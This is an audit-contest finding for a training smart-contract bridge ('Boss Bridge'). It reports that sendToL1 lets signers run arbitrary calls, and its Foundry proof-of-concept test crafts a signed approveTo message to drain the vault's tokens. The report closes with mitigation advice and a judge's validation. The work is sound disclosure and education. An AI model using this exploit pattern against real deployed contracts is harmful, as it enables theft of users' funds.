First Flight #4: Boss Bridge

First Flight #4

Beginner FriendlyFoundryBridge

100 EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Signers can craft message steal funds and bypass Ownable security

n0kto

Summary

The sendToL1 function in the smart contract allows any signer to execute arbitrary functions in the vault contract by passing a message. This poses a security risk as signers can bypass the necessary checks and perform unauthorized actions.

Vulnerability Details

The vulnerability lies in the sendToL1 function where it allows signers to execute arbitrary function. The message passed to the function contains the target contract address, the value to send, and the data to execute. This allows signers to call any function in any contract with msg.sender == address(instanceOfL1BossBridge, and so bypass functions that should only be accessible to this contract. But also craft a withdraw message the money of the vault.

Foundry (put in test file) PoC :

function testSignerCanBypassVaultApprovalPoC() public {

// setup attacker account

vm.prank(deployer);

token.transfer(address(attacker), 1000e18);

// user send money to the bridge

testUserCanDepositTokens();

// Exemple of using the vault approveTo function bypassing of the owner check

// to steal all the vault

bytes memory message_sent_by_signer = abi.encode(

address(vault),

abi.encodeCall(L1Vault.approveTo, (attacker, UINT256_MAX))

);

(uint8 v, bytes32 r, bytes32 s) = _signMessage(

message_sent_by_signer,

operator.key

);

// withdraw to the operator address (steal user's money)

vm.prank(operator.addr);

tokenBridge.sendToL1(v, r, s, message_sent_by_signer);

vm.startPrank(attacker);

token.transferFrom(address(vault), attacker, 10e18);

// Check the success of the steal

assertEq(token.balanceOf(attacker), 1010e18);

// Give back money because we are white hats, not sneaky thief.

token.transfer(address(vault), 10e18);

assertEq(token.balanceOf(attacker), 1000e18);

vm.stopPrank();

}

Impact

This vulnerability allows signers to bypass the necessary checks and execute unauthorized actions in the vault contract. For example, an attacker can use this vulnerability to call the approveTo function in the vault contract, bypassing the owner check and permit (by phishing, threatening, etc) stealing all the vault's funds.

Moreover, the signer can use the same message crafted in the withdrawToL1 to steal all the token.
This vulnerability is explicated in my other submission.

Tools Used

Manual review

Recommendations

To mitigate this vulnerability, it is recommended to implement proper access control mechanisms in the sendToL1 function. The function should only allow signers to execute specific functions that are deemed safe and necessary for the intended functionality of the smart contract (here: withdraw). Additionally, it is important to thoroughly review the permissions and roles assigned to signers to ensure that only authorized actions can be performed.

Updates

Lead Judging Commences

0xnevi Lead Judge almost 2 years ago

Submission Judgement Published

Validated

Assigned finding tags:

sendToL1(): Wrong function visibility

Rewards breakdown

nSLOC

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.